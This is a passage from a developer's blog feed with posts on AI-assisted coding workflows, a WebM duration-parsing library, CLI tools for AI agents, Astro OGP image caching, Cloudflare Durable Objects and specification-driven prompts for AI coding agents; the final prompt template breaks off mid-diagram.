When we write code manually, we tend to stick to what we know (Local Optima). If I know Python well, I'll solve every problem with Python. By throwing AI at the problem, I can ask it to generate solutions in languages or paradigms I'm less familiar with. The AI might suggest a Rust-based microservice for a bottleneck I was trying to optimize in Node.js. The "search space" for solutions expands dramatically.

2. Deepening Understanding via Comparison

The best way to learn a trade-off is to see it. By generating Option A (High Performance, High Complexity) and Option B (Lower Performance, High Readability) and placing them next to each other, the abstract trade-off becomes concrete. This "rich" comparison process sharpens my architectural intuition.

The New Bottleneck: Choice Fatigue

However, this new wealth brings a new problem: Decision Fatigue.

If traditional Millionaire Programming suffered from "Software Bloat," AI-based Millionaire Programming suffers from "Choice Overload." We are faced with a combinatorial explosion of valid options.

For a single web application, you might instantly be presented with:

Next.js deployed on Vercel
Remix running on Cloudflare Workers
Astro hosted on Netlify
Plain React on AWS S3
...and dozens of other viable combinations.

To navigate this, the role of the senior engineer shifts. We are no longer just "builders"; we are "curators." Our value lies not in how fast we type, but in how effectively we can filter the abundance of generated options to find the one that fits the business constraints.

Conclusion: From Craft to Curation

"Millionaire Programming" used to be about laziness—letting the hardware do the heavy lifting of memory management.

Today, it is about strategy. It is about leveraging the infinite patience and speed of AI to explore the map of possibilities before we commit to a path.

We are throwing AI at the problem to gain something far more valuable: better decisions.

In this new era, don't be afraid to be a "millionaire." Ask for five different implementations. Generate code you intend to throw away. Use this abundance to find the signal in the noise.

Antigravity and Jules

Sat, 20 Dec 2025 00:00:00 GMT

My original motivation for subscribing to Gemini AI Pro was to access the advanced chat model and the Google Workspace assistance features. However, since the plan also includes usage quotas for Jules and Antigravity, I started experimenting with them to see how they fit into my development process.

For my daily tasks, these tools have settled into specific niches that improve my workflow, distinct from other web-based coding agents I have used in the past.

Previously, I used the web interface for Codex. While powerful, I found the web UI to be incredibly heavy, often causing Google Chrome to hang or enter a "waiting" state. It created friction in what should be a quick process.

In contrast, Jules runs comfortably. The interface is snappy and responsive, which is critical when I want to iterate quickly. It isn't perfect—it occasionally gets stuck in an infinite loop executing the same command—but for routine tasks like small bug fixes or package updates, it handles the job without the browser lag.

The standout feature for me, however, is Antigravity, specifically its "Agent Manager" mode.

Most chat-based AI tools require immediate, synchronous interaction. You type, you wait, you reply. It feels like a conversation that demands your full attention. Antigravity feels different; it is closer to sending an email to a colleague to handle a task in the background.

I can fire off a request and let it run parallel to my own work. I particularly appreciate two features:

Inline Comments on Plans: I can review the agent's proposed plan and add comments directly in context before execution.
Task Queuing: This is the most significant UX improvement. If I think of a task while doing something else, I can explicitly queue it for later execution. It doesn't force a context switch or interrupt my current "field work."

Having these included in my existing subscription has been a welcome addition to my toolkit.

The Reverse Centaur

Tue, 16 Dec 2025 00:00:00 GMT

I recently read "The Reverse Centaur’s Guide to Criticizing AI," where he makes a crucial distinction:

In automation theory, a "centaur" is a person who is assisted by a machine... Obviously, a reverse centaur is machine head on a human body, a person who is serving as a squishy meat appendage for an uncaring machine.

I feel this split is widening based on the difficulty of verification.

In software engineering, where testing and verification are relatively easy to automate, Generative AI empowers us as Centaurs. However, in physical tasks or complex human communication—where verification is difficult—technology often turns humans into Reverse Centaurs. Instead of assistance, the machine simply imposes strict efficiency metrics, forcing humans to bridge the gap between algorithmic logic and reality at an exhausting pace.

Pursuing efficiency to the point where the workplace becomes hostile to humans puts the cart before the horse.

Digital Folklore: The Unsearchable Origins of the 'Silhouette' Dance

Sat, 13 Dec 2025 00:00:00 GMT

Around November 2025, a specific dance challenge began to go viral in Japan. Set to KANA-BOON's iconic track "Silhouette" (a beloved Naruto opening theme), the choreography mimics ninja hand signs (ninjutsu) synchronized to the beat.

While the trend itself is widespread, one question remains surprisingly difficult to answer: Who actually choreographed this?

As I attempted to trace the "Patient Zero" of this viral movement, I encountered a fascinating problem that highlights the current limitations of information retrieval in the age of video.

The Search for the Originator

Finding the source of a text-based meme is relatively straightforward in 2025. Large Language Models (LLMs) and advanced search indices can parse forums and archives effectively. However, tracking the origin of a specific physical movement—a choreography—across platforms like TikTok and Instagram remains a significant challenge.

The difficulty stems from two main factors:

Semi-Closed Ecosystems: Much of this data resides within the "walled gardens" of vertical video platforms, which are not fully indexed by open web crawlers.
The "Choreography" Data Problem: Search engines still struggle to identify and categorize specific sequences of human motion. Unlike keywords, a dance move is fluid. It undergoes subtle "remixes" and modifications with every user iteration, behaving more like ancient oral tradition or folklore than digital data.

The Oldest Record So Far

In my personal investigation, the oldest instance I could verify is a post by @ross.hime dated July 19, 2025.

<blockquote class="tiktok-embed" cite="https://www.tiktok.com/@ross.hime/video/7528762593809288456" data-video-id="7528762593809288456" style="max-width: 605px;min-width: 325px;"> <section> <a target="_blank" title="@ross.hime" href="https://www.tiktok.com/@ross.hime?refer=embed">@ross.hime</a> naruto ninjitsu hands tutorial please 😂 <a title="narutoshippuden" target="_blank" href="https://www.tiktok.com/tag/narutoshippuden?refer=embed">#narutoshippuden</a> <a title="silloulettechallenge" target="_blank" href="https://www.tiktok.com/tag/silloulettechallenge?refer=embed">#silloulettechallenge</a> <a title="fyppppppppppppppppppppppp" target="_blank" href="https://www.tiktok.com/tag/fyppppppppppppppppppppppp?refer=embed">#fyppppppppppppppppppppppp</a> <a title="japan" target="_blank" href="https://www.tiktok.com/tag/japan?refer=embed">#japan</a> <a title="anime" target="_blank" href="https://www.tiktok.com/tag/anime?refer=embed">#anime</a> <a title="dancechallenge" target="_blank" href="https://www.tiktok.com/tag/dancechallenge?refer=embed">#dancechallenge</a> <a target="_blank" title="♬ シルエット - KANA-BOON" href="https://www.tiktok.com/music/シルエット-7525407952354822928?refer=embed">♬ シルエット - KANA-BOON</a> </section> </blockquote> <script async src="https://www.tiktok.com/embed.js"></script>

However, given the nature of the internet, it is highly probable that an even earlier version exists—perhaps the one that inspired this very video.

Crowdsourcing the History

It is ironic that despite the leap in AI capabilities regarding text and code generation, we still lack a reliable "Reverse Choreography Search." The history of internet culture is being written in video format, and without proper archiving, the origins of these cultural moments risk being lost to the feed.

If you know of a version of the Silhouette dance that pre-dates July 2025, or if you have information about the true originator, please let me know. I am collecting information via the form below.

Submit Information Here

I will update this post if new evidence comes to light.

Fixing the WebM "Missing Duration" Problem with a Lightweight, Zero-Dependency Library

Sun, 07 Dec 2025 00:00:00 GMT

Introduction

Have you ever implemented audio or video recording features using the browser's standard MediaRecorder API? While it is a powerful and convenient API, developers often run into a frustrating issue: the generated WebM files frequently lack the Duration metadata property, or report it as Infinity.

This "missing duration" issue causes several downstream problems:

Server-side validation fails: Checks like "Max duration: 1 minute" become impossible.
Media players struggle: Total time is not displayed.
UI glitches: Seek bars fail to function correctly.

To solve this problem and accurately calculate the playback duration directly from WebM binaries, I built a new library called webm-meta-lite.

Repository: https://github.com/ainoya/webm-meta-lite

The Problem with Existing Solutions

When I first faced this issue, I researched existing solutions, but they felt like using a sledgehammer to crack a nut.

1. Using FFmpeg

FFmpeg is the industry standard for media processing. However, installing a massive binary on a server or container just to read a single timestamp is overkill. It significantly bloats Docker image sizes and adds unnecessary complexity to the deployment pipeline.

2. Existing JavaScript Libraries

There are Node.js libraries for WebM, but many are bundled with heavy recording or transcoding features. I only needed a lightweight parser, not a full media suite.

The Solution: webm-meta-lite

webm-meta-lite focuses on parsing the WebM binary structure to calculate the exact duration efficiently.

Zero Dependencies: No external runtime dependencies to worry about.
Pure TypeScript: No native binaries required. It runs seamlessly in both browsers and Node.js.
Read-Only / Safe: It scans the binary to extract information without mutating or rewriting files.

Usage

The API is straightforward. You pass a WebM Blob (or a compatible Reader), and it returns the parsed metadata.

If you are using Node.js (v19.8+), utilizing fs.openAsBlob is the cleanest approach.

import { parseWebm } from 'webm-meta-lite';
import { openAsBlob } from 'node:fs';

async function main() {
  // 1. Open the file as a Blob (Node.js v19.8+)
  const blob = await openAsBlob('./input.webm');

  // 2. Parse Metadata
  // Even if the header lacks duration, the library scans the data to calculate it.
  const metadata = await parseWebm(blob);

  // 3. Use the result
  // Note: The unit is milliseconds
  console.log(`Duration: ${metadata.durationMilliSeconds} ms`);
  
  // Example: Server-side validation
  if (metadata.durationMilliSeconds > 60 * 1000) {
    throw new Error('Uploads must be under 1 minute.');
  }
}

main();

For browsers, you can pass the File object directly. For older Node.js versions, the library also provides a createBufferReader helper.

How It Works: The 3-Stage Fallback Strategy

The core strength of this library lies in its algorithm. If the metadata is not found in the header, it calculates the duration from the actual data. Inspired by robust implementations in FFmpeg and webminspector, webm-meta-lite uses a 3-stage fallback strategy to ensure accuracy while maintaining performance.

Step 1: Header Scan

The library reads the first 64KB of the file. If the Duration is present in the Info segment, it returns immediately. This is the fastest path.

Step 2: Cues Scan

If the header is missing the duration, it looks for the Cues (index) element. If found, it uses the timestamp of the last Cue point to determine the length.

Step 3: Tail Scan (The "Safety Net")

If neither of the above works—common with streamed recordings—the library performs a Tail Scan. It reads only the last 2MB of the file and scans the byte-level structure of the Cluster elements. By finding the timestamp of the very last audio/video block, it calculates the precise total duration.

Summary

MediaRecorder often produces WebM files with missing or Infinity duration.
FFmpeg is frequently too heavy for simple duration checks.
webm-meta-lite provides a lightweight, zero-dependency, and fast way to calculate duration.
It implements a robust 3-stage fallback algorithm inspired by FFmpeg.

If you need to validate user-uploaded audio/video on the backend or display accurate times in your UI, give it a try!

Building Small CLI Tools for AI Agents

Sat, 06 Dec 2025 00:00:00 GMT

Recently, the Model Context Protocol (MCP) has been gaining significant attention in the context of AI agent utilization. However, I deliberately chose a different path—a mature approach using the CLI (Command Line Interface)—to create my own operation interfaces for daily tools like Slack, Atlassian, and Esa, going against the current trend.

"Why use a simple CLI now instead of the rich MCP?" The reason lies in the "economics of information" surrounding the context windows of current LLMs and a return to the good old "Unix Philosophy".

Here are the tools I created (written in Go):

Slack CLI: https://github.com/ainoya/slack-cli
Atlassian CLI: https://github.com/ainoya/atlassian-cli
Esa CLI: https://github.com/ainoya/esa-cli

The "Context Pressure" Problem with MCP

Many current MCP server implementations tend to be designed to pass rich information from connected tools into the context. However, LLM context windows are finite and cost money. Simply asking an AI to "check the latest Slack messages" can result in loading a massive amount of unnecessary noise, lowering the signal-to-noise ratio of information (which in turn lowers the accuracy of the answer). This puts the cart before the horse.

"Pre-filtering" with CLI and Pipelines

This is where the strength of the CLI comes into play. With a CLI, you can physically narrow down information using Linux pipeline processing before passing it to the AI.

For example, when letting an AI agent read logs, an MCP implementation might inadvertently pass "all logs". With a CLI, you can write it like this:

# Filter only the truly necessary information and pass it to the context
slack-cli log --channel "dev-ops" | grep "ERROR" | tail -n 20

Instead of throwing raw information at the AI, humans filter it with intention (Pre-filtering). I believe this "Unix Philosophy" approach is what directly leads to token savings and improved accuracy.

The Ease of Defining in "Markdown"

The CLI approach is also advantageous for configuring Claude Code or Cursor. Modifying the logic of an MCP server itself is a hassle, but with a CLI, you can tune the behavior simply by describing instructions in Markdown (natural language), such as "run this command with these arguments".

MCP: Requires server-side code modifications.
CLI: Adjustable just by rewriting the prompt (configuration file).

This "tactile feel" and "agility" are extremely important in individual development workflows.

Summary

Of course, MCP is suitable for operations requiring complex state management. However, for "Read operations" such as checking documents or logs, I feel that the CLI × Pipeline approach might actually be the most "AI Native" solution.

If you are interested, please take a look at the repositories.

Cache Satori-generated OGP images in Astro Cactus to speed up builds

Mon, 25 Aug 2025 00:00:00 GMT

Astro Cactus ships with dynamic Open Graph (OGP) images: for each post, the theme renders a title card using Satori (to SVG) and Resvg (to PNG). It’s convenient—but if every image is regenerated on every build, the OGP step adds up. On my machine, each image takes roughly 100–300 ms, which becomes noticeable with dozens of posts.

This post shows a simple, file-based cache that avoids re-rendering unchanged images. The approach is deterministic, CI-friendly, and requires no extra services.

How it works

We compute a content hash from the post’s title and date.
We store the rendered PNG in node_modules/.og_image_cache/<hash>.png.
On the next build, if the PNG exists, we reuse it; otherwise we render and save.

The cache key changes whenever the title or date changes, so the image is re-rendered only when necessary.

The code

import crypto from "node:crypto";
import fs from "node:fs";
import path from "node:path";
import { Resvg } from "@resvg/resvg-js";
import type { APIContext } from "astro";
import satori, { type SatoriOptions } from "satori";
import { html } from "satori-html";
import RobotoMonoBold from "@/assets/roboto-mono-700.ttf";
import RobotoMono from "@/assets/roboto-mono-regular.ttf";
import { getAllPosts } from "@/data/post";
import { siteConfig } from "@/site.config";
import { getFormattedDate } from "@/utils/date";

const ogOptions: SatoriOptions = {
  // debug: true,
  fonts: [
    { data: Buffer.from(RobotoMono), name: "Roboto Mono", style: "normal", weight: 400 },
    { data: Buffer.from(RobotoMonoBold), name: "Roboto Mono", style: "normal", weight: 700 },
  ],
  height: 630,
  width: 1200,
};

// Cache directory: keep it out of git, easy to persist in CI.
const CACHE_DIR = path.join(process.cwd(), "node_modules", ".og_image_cache");

// Ensure cache directory exists.
function ensureCacheDir() {
  if (!fs.existsSync(CACHE_DIR)) {
    fs.mkdirSync(CACHE_DIR, { recursive: true });
  }
}

// Create a short, deterministic content hash.
function generateContentHash(title: string, pubDate: Date): string {
  const content = `${title}-${pubDate.toISOString()}`;
  return crypto.createHash("sha256").update(content).digest("hex").slice(0, 16);
}

// Lookup or render the PNG, then persist it.
async function getCachedOrGeneratePng(
  title: string,
  pubDate: Date,
  postDate: string,
): Promise<Uint8Array> {
  ensureCacheDir();

  const contentHash = generateContentHash(title, pubDate);
  const cacheFilePath = path.join(CACHE_DIR, `${contentHash}.png`);

  if (fs.existsSync(cacheFilePath)) {
    console.log(`Using cached OG image for: ${title}`);
    return new Uint8Array(fs.readFileSync(cacheFilePath));
  }

  console.log(`Generating new OG image for: ${title}`);
  const svg = await satori(markup(title, postDate), ogOptions);
  const png = new Resvg(svg).render().asPng();
  const pngBuffer = new Uint8Array(png);

  fs.writeFileSync(cacheFilePath, pngBuffer);
  return pngBuffer;
}

const markup = (title: string, pubDate: string) =>
  html`<div tw="flex flex-col w-full h-full bg-[#1d1f21] text-[#c9cacc]">
    <div tw="flex flex-col flex-1 w-full p-10 justify-center">
      <p tw="text-2xl mb-6">${pubDate}</p>
      <h1 tw="text-6xl font-bold leading-snug text-white">${title}</h1>
    </div>
    <div tw="flex items-center justify-between w-full p-10 border-t border-[#2bbc89] text-xl">
      <div tw="flex items-center">
        <p tw="font-semibold">${siteConfig.title}</p>
      </div>
      <p>by ${siteConfig.author}</p>
    </div>
  </div>`;

export async function GET(context: APIContext) {
  const { pubDate, title } = context.props;

  const postDate = getFormattedDate(pubDate, {
    month: "long",
    weekday: "long",
  });

  const pngBuffer = await getCachedOrGeneratePng(title, pubDate, postDate);

 const body = pngBuffer.slice(0).buffer;
 return new Response(body, {
  headers: {
   // Adjust cache headers as needed for your use case.
   "Cache-Control": "public, max-age=31536000, immutable",
   "Content-Type": "image/png",
  },
 });
}

export async function getStaticPaths() {
  const posts = await getAllPosts();
  return posts
    .filter(({ data }) => !data.ogImage) // skip if a custom image is set
    .map((post) => ({
      params: { slug: post.id },
      props: {
        pubDate: post.data.updatedDate ?? post.data.publishDate,
        title: post.data.title,
      },
    }));
}

What each piece does

Cache directory
- node_modules/.og_image_cache is ignored by git and easy to persist across CI runs. If your CI re-installs dependencies from scratch, persist this path between builds to get the benefit.
Cache key
- `sha256(title + ISO(pubDate)), first 16 hex chars. If the title or date changes, we get a new key and the image is regenerated.
SVG → PNG
- Satori returns SVG; Resvg rasterizes to PNG. Fonts are embedded via SatoriOptions so the output is deterministic.
Endpoint behavior
- The endpoint uses getStaticPaths() with props so the images are pre-rendered at build time (SSG). The Cache-Control header is for browser/CDN caching and is separate from the on-disk cache.
Updated posts
- We pass updatedDate ?? publishDate to the hash. Any content update that bumps updatedDate will invalidate the image.

Operational notes

CI persistence
- If builds happen in a clean environment, configure your CI cache to persist node_modules/.og_image_cache. No additional services are needed.
When to invalidate
- Decide what should trigger a new image. Title + date works for most blogs. If you frequently tweak the template, include a version salt (see below).
Growth management
- Over long periods, the cache can grow. Consider a small cleanup script to remove files older than N days.

Optional improvements

Add a template/version salt

If you change fonts, colors, or layout, you likely want all images to refresh. Add a constant to the hash:

const CACHE_VERSION = "v1"; // bump when markup/fonts change
function generateContentHash(title: string, pubDate: Date): string {
  const content = `${CACHE_VERSION}|${title}|${pubDate.toISOString()}`;
  return crypto.createHash("sha256").update(content).digest("hex").slice(0, 16);
}

Hash the actual markup

For the most robust invalidation, hash the full SVG input (including site title/author/date formatting):

const svgInput = markup(title, postDate);
const contentHash = crypto.createHash("sha256").update(JSON.stringify({ svgInput })).digest("hex").slice(0, 16);

Store pre-renders under public/og/

If you prefer visible, versioned assets that can be uploaded to a CDN or backed up outside node_modules, write PNGs to public/og/<hash>.png and reference them by URL. The trade-off is repo churn or extra cleanup if you commit them.

Concurrency controls for very large blogs

When building hundreds of images in parallel, Resvg can saturate CPU. A simple promise pool (e.g., p-limit) around your generation logic can keep the build smooth.

Font and license hygiene

Keep fonts local and embed them via SatoriOptions as shown. Make sure your font license permits embedding in generated images.

Results

With caching enabled, unchanged posts reuse their OGP images immediately. On my setup the OGP step dropped by roughly 100–300 ms per image that didn’t need regeneration, which noticeably reduced total build time as the post count grew.

Footnotes & pointers

Astro endpoints are called at build time in SSG and can generate static files; they become live routes in SSR.
Satori converts HTML/CSS to SVG; Resvg rasterizes SVG to PNG.

Rethinking State: My Experience with Cloudflare's Durable Objects

Sun, 03 Aug 2025 00:00:00 GMT

I recently found myself architecting a seamless experience for an AI chat application. The goal was simple: if a user's connection drops during a streaming response, they should be able to reconnect and pick up right where they left off.

My initial thought was a conventional setup using Redis Streams. It's a solid, well-understood pattern for handling streaming data and reconnections. However, during my research, I stumbled upon a technology that promised to solve the same problem with a radically different approach: Cloudflare Durable Objects.

The more I delved into it, the clearer it became that this wasn't just an alternative solution. It was a groundbreaking architecture that challenges the fundamental assumptions we hold about distributed systems, a sentiment echoed in Cloudflare's introductory blog post. This article chronicles that journey of discovery, from initial skepticism to a full-blown paradigm shift in how I think about building stateful applications.

TL;DR

Cloudflare Durable Objects are not just another feature; they represent a paradigm shift in how we build stateful applications. By providing strong consistency at the edge, zero-latency SQL, and automatic geographic distribution, they dismantle constraints that have defined distributed systems for decades.

A New Foundation: Breaking Through Old Limits

Traditional serverless architectures, for all their benefits, are built on a core limitation: they are stateless. This design choice offloads state management to external databases, introducing network latency and geographical constraints.

Durable Objects, however, are inherently stateful. The revolutionary idea behind them is the concept of a "globally unique instance," as detailed in the official documentation. A Durable Object with a specific ID is guaranteed to exist only once in the entire world. Any client, from anywhere, can access that single, unique instance.

// A globally unique counter
let id = COUNTER_NAMESPACE.idFromName("global-counter");
let counter = COUNTER_NAMESPACE.get(id);
let response = await counter.fetch(request);

This simple primitive unlocks a completely new way of building applications by co-locating state and the code that operates on it.

Architectural Showdown: Redis vs. Durable Objects

Let's compare the two approaches for our chat application.

The Traditional Redis Stream Approach

This architecture involves multiple WebSocket servers, a load balancer, and a Redis cluster for state management.

graph TD
    subgraph "Conventional Architecture"
        A[Load Balancer] --> B[WebSocket Server 1]
        A --> C[WebSocket Server 2]
        A --> D[WebSocket Server N]
        B --> E[Redis Stream]
        C --> E
        D --> E
        E --> F[Persistence Layer]
    end

    G[Client] --> A
    H[Problem: State synchronization]
    I[Problem: Complex failure handling]
    J[Problem: Scaling complexity]

The challenges are numerous: synchronizing state across servers, the operational overhead of managing Redis, and complex recovery logic.

The Durable Objects Approach

With Durable Objects, the architecture is radically simplified. Each chat session becomes a Durable Object, encapsulating all its state and logic.

graph TD
    subgraph "Durable Objects Architecture"
        A[Global Edge] --> B[Chat Session DO]
        B --> C[Local SQLite]
        B --> D[WebSocket Connections]
        D --> E[Client 1]
        D --> F[Client 2]
    end

    H[Automatic Geo-Distribution]
    I[Code and State Colocation]
    J[Zero-Latency Access]

This eliminates external middleware and allows the system to benefit from Cloudflare's global network for automatic geographic distribution. The difference in implementation is stark, moving from complex, multi-system coordination to a self-contained, elegant object.

The Revolution: Zero-Latency SQLite Integration

This is where Durable Objects truly defy conventional wisdom. They offer synchronous SQL execution directly within the object, a feature Cloudflare detailed in their post, "Zero-latency SQLite storage in every Durable Object."

// No await needed for reads!
let cursor = sql.exec("SELECT name, email FROM users");
for (let user of cursor) {
  console.log(user.name, user.email);
}

This is possible because SQLite runs as a library in the same thread as your code, with data aggressively cached in memory and stored on a local SSD. To prevent synchronous writes from blocking the process, Cloudflare introduced Output Gates, a mechanism that holds a response until the data has been durably stored, ensuring both performance and consistency.

Solving the N+1 Query Problem for Good

This zero-latency access effectively eliminates the "N+1 query problem" at its root. In a traditional architecture, 101 queries over a network with 5ms latency would take over half a second. Inside a Durable Object, the same 101 queries are function calls that complete in a few milliseconds.

This isn't just an optimization; it's a fundamental change in the performance model. It liberates developers from "N+1 query phobia" and allows them to write simple, clear, and maintainable code without sacrificing performance. The need for complex JOIN statements, often a source of technical debt, simply evaporates.

Why Is This Technology So Unique?

A striking fact is that no other major cloud provider offers anything quite like Durable Objects. While services like AWS Lambda or Google Cloud Functions are powerful, they remain fundamentally stateless at the edge. The tight integration of stateful compute, persistent storage, and a global network is, for now, unique to Cloudflare. This uniqueness stems from Cloudflare's ability to leverage its massive, pre-existing global network of over 300 data centers to build a truly distributed platform.

A New Mindset: Designing with Actors

To leverage Durable Objects effectively, we must shift our thinking from the traditional request/response model to the Actor Model. At its core, the Actor Model treats "actors" as the fundamental units of computation. Each actor is an independent entity with its own state and logic, communicating with others exclusively through asynchronous messages. This approach is a natural fit for Durable Objects and requires avoiding common pitfalls.

Anti-Pattern 1: The Monolithic "God" Object

Avoid creating a single DO to manage state for all users. This creates a massive bottleneck, as all requests are serialized through a single thread, a limitation outlined in the platform limits documentation. The correct approach is to assign one DO per logical entity, such as a chat room or a user session.

Anti-Pattern 2: Synchronous External API Calls

Making a long-running external API call inside a DO will block all other requests to that object. Instead, long-running tasks should be offloaded to background processes using the Alarms API. This ensures the object remains responsive.

// ❌ BAD: Blocking on a slow external API
export class Order extends DurableObject {
  async processPayment() {
    // This call could take seconds, blocking all other operations
    const result = await fetch('https://slow-payment-api.com/charge');
    return result.json();
  }
}

// ✅ GOOD: Use Alarms for non-blocking operations
export class Order extends DurableObject {
  async schedulePaymentProcessing() {
    // Immediately respond to the client
    // Schedule the long-running task to be executed later
    await this.ctx.storage.setAlarm(Date.now() + 1000);
    return new Response(JSON.stringify({ status: 'processing' }), { status: 202 });
  }

  async alarm() {
    // The alarm runs in the background without blocking new requests
    await fetch('https://slow-payment-api.com/charge');
    // ...update state after the API call completes
  }
}

Conclusion

Cloudflare's Durable Objects are more than just a clever piece of engineering. They represent a fundamental shift in how we can and should build applications for the web.

A Paradigm Shift: They bring stateful computing back to the edge, challenging the "stateless-first" orthodoxy.
A Technical Breakthrough: Zero-latency SQL access inside a serverless function fundamentally changes performance calculations.
A Superior Developer Experience: They drastically simplify the architecture for complex features like real-time collaboration, as demonstrated in tutorials like the chat application example.
Proven Reliability: Cloudflare uses Durable Objects to power its own critical services, offering features like 30-day point-in-time recovery as a byproduct of its robust design.

In exploring a solution for a simple chat application, I found a technology that offers a glimpse into the future of distributed application architecture. It's a future that is simpler, faster, and more powerful.

Beyond "Just Code It": Adapting Specification-Driven Principles for AI Agents

Sat, 02 Aug 2025 00:00:00 GMT

The era of AI-powered software development is firmly upon us. If you've ever felt overwhelmed by an AI agent going rogue and generating unmanageable code, or if you're a solo developer using tools like Cursor and seeking a more structured way to collaborate with your AI partner, this article is for you. Tools like GitHub Copilot and emerging AI agents have shifted from novelties to my daily drivers. But this shift has introduced a new challenge: the "wall of text" review.

I've been there. You give an AI agent a task and return to find hundreds of lines of new code. This isn't just a feeling; it's a measurable drain on productivity. A survey featured on DevOps.com, for instance, found that 67% of developers reported spending more time debugging AI-generated code.

To address this, I turned to a proven software engineering practice: Specification-Driven Development (SDD). This approach, championed by modern development tools like Kiro, emphasizes defining a clear specification before writing code. I decided to adapt this philosophy for my collaboration with AI agents, transforming the AI from a mere "coder" into a "design partner."

The Workflow: Applying SDD to AI Collaboration

My process applies the core principles of SDD to my interactions with AI. It starts with a structured dialogue to ensure alignment before any code is written, turning a free-form instruction into a well-defined plan.

Phase 1: The Guardrail Prompt

Autonomous AI agents tend to rush into coding. To counter this, I don't just ask the AI to "implement a feature." I use a "guardrail prompt" that instructs it to act as my design partner and first ask clarifying questions. This initial dialogue, a cornerstone of good design practice, forces the AI to pause and think, creating a shared understanding of the requirements upfront.

Here is a practical "guardrail prompt" I use to start the conversation:

You are an expert software design partner. Before generating any code, your primary goal is to understand the requirements deeply.

Based on the feature request below, you must first ask me clarifying questions to understand:
1. **Why**: The business goal or the problem this feature solves.
2. **Who**: The end-users (e.g., general user, admin) and their needs.
3. **What**: The primary use cases.
4. **Constraints**: Any technical limitations or required libraries/frameworks.
5. **Non-functional requirements**: Specific concerns about security, performance, etc.

Do not write any design documentation or code until I have answered these questions.

My feature request is: [Your feature idea here]

Phase 2: The Structured Specification for Reliable AI Implementation

Based on the dialogue, the AI generates a formal design document in Markdown. This document becomes the foundation that enables AI agents to implement features accurately and systematically, following the SDD principle of establishing a Single Source of Truth.

The document contains specific elements that AI agents need for reliable implementation:

Use cases (Given/When/Then).
A domain model (Mermaid.js diagram).
API specifications (OpenAPI).
Sequence diagrams.
Database schema definitions (DDL).
A revision history for tracking changes.

This structured approach ensures that AI agents have all the context they need to implement features without guesswork. When requirements evolve, I update the document with clear versioning to maintain implementation accuracy across iterations.

Phase 3: Detecting Complexity as a Signal

A valuable lesson I've learned from this process has been using the AI's questions as a "complexity sensor." If I, the human developer, find it difficult to answer the AI's questions, it's a strong signal that the feature itself is too complex or ill-defined.

This friction tells me it's time to simplify. I split the feature into smaller, more manageable pieces and restart the specification process for each. This feedback loop helps me adhere to the principle of "divide and conquer."

Phase 4: Generating Actionable Tasks from the Specification

Once I approve the design document, I instruct the AI: "Based on this confirmed specification, generate a list of implementation tasks."

The AI then analyzes the entire document and produces a checklist of discrete, ordered tasks, perfectly suited for AI coding tools:

* [ ] Task 1: Generate TypeScript type definitions from the OpenAPI schema.
* [ ] Task 2: Create a database migration file based on the DDL.
* [ ] Task 3: Implement the POST /users endpoint handler and routing.

Because each task is small, specific, and derived from a mutually agreed-upon plan, the AI's success rate is significantly higher.

Why This Adaptation of SDD Works

Applying these specification-driven principles to my AI workflow has yielded clear benefits:

It drastically reduces the cognitive load of reviews. I can focus on the design, not on deciphering a mountain of code.
It keeps the human in the driver's seat. The process ensures my development aligns with strategic goals.
It minimizes rework. Catching misunderstandings at the design phase is far more efficient. Research by IBM's Systems Sciences Institute famously found that fixing a bug after release can cost up to 100 times more than fixing it during design. My approach is a practical application of this wisdom in the AI era.

Conclusion: A More Sustainable Way to Collaborate with AI

This methodology isn't a new invention, but rather my deliberate adaptation of a robust engineering principle to the unique challenges of AI collaboration. It establishes a clear division of labor: I define the "what" and "why," while the AI executes the "how."

By re-emphasizing the importance of the specification, I can harness the power of AI agents without abdicating my role as an architect. I trade the chaos of the "wall of text" for the clarity of a structured dialogue, leading to a more controlled, predictable, and ultimately faster development lifecycle.

Appendix: A Real-World Prompt for Specification-Driven AI Collaboration

To make this workflow even more concrete, here is the comprehensive prompt I use with AI agents like Cursor. It encapsulates all the steps discussed, from the initial dialogue to generating the final task list. This prompt turns the AI into a dedicated design partner that follows the SDD process rigorously.

# Rules for Specification-Driven Development with an AI Agent

## Role

You are an **expert design partner specializing in Specification-Driven Development (SDD)**. Inspired by tools like Kiro, your primary mission is to define a "specification" first and then derive all documents and code from it. This ensures a consistent and efficient development process with minimal rework.

Your main task is to respond to a feature development request by **identifying missing requirements through dialogue** with the user, building consensus, and accurately generating the following deliverable:

1. **Design Document (docs/[feature-name].md)**: This document defines the "Why" and "What" of the feature and includes the API specification. It serves as the **Single Source of Truth**.

## Execution Process

When you receive an instruction like "Design the [feature-name] feature," you must strictly follow these steps.

### Step 0: The Clarification Dialogue

After receiving the initial instruction, do not start generating the document immediately. First, ask the user clarifying questions to improve the resolution of the design and identify potential oversights.

**<Your Action>**

1. Identify the feature name from the user's instruction.
2. Based on the "Design Requirements Checklist" below, generate questions about any unclear points and ask the user for answers.

> **Example AI Response:**
> "Understood. I will begin designing the '[feature-name]' feature.
> To ensure the design is accurate, please allow me to ask a few questions:
>
> **[Design Requirements Checklist]**
> - **Background/Goal (Why):** What specific problem or business objective does this feature address?
> - **Users (Who):** What kind of users will use this feature (e.g., general users, administrators)?
> - **Primary Use Cases (What):** Could you describe the most important and representative user scenarios?
> - **Technical Constraints:** Are there any technical constraints or required libraries/services?
> - **Non-functional Requirements:** Are there any special considerations for security, performance, or future scalability?
>
> Could you please provide information on these points to the best of your ability?"

### Step 1: Initialize Project Structure

Generate a file structure based on the feature name. For example, for "User Authentication," create `docs/user-authentication.md`.

### Step 2: Generate the Design Document

Based on the information gathered in Step 0, generate a draft of the design document using the template below.

---

# [Feature Name] Design Document

> **Purpose**: This document aims to create a shared understanding by defining the feature's background, use cases, domain model, and technical API specifications. This document is the Single Source of Truth.

**Revision History**

| Date       | Version | Author | Summary of Changes   |
| :--------- | :------ | :----- | :------------------- |
| YYYY-MM-DD | 1.0.0   | AI     | Initial draft creation |

**Table of Contents**

- [1. Introduction](#1-introduction)
- [2. Use Cases](#2-use-cases)
- [3. Domain Model](#3-domain-model)
- [4. API and Implementation Design](#4-api-and-implementation-design)
- [5. Considerations](#5-considerations)

---

## 1. Introduction

(Describe the feature's background, purpose, and scope based on the Step 0 dialogue.)

## 2. Use Cases

#### UC-001: [Use Case Name]

**Actor**: (The user or system performing the action)
**Trigger**: (The event that initiates this use case)

**Given**:
- (Preconditions that must be true before the use case starts)

**When/Then**:
1. **When**: (The user performs an action)
2. **Then**: (The system responds or changes state)

**Postconditions (on success)**:
- (The state of the system after the flow is successfully completed)

## 3. Domain Model

```mermaid
classDiagram
  class EntityA {
    -id: string
    +action()
  }
  class EntityB {
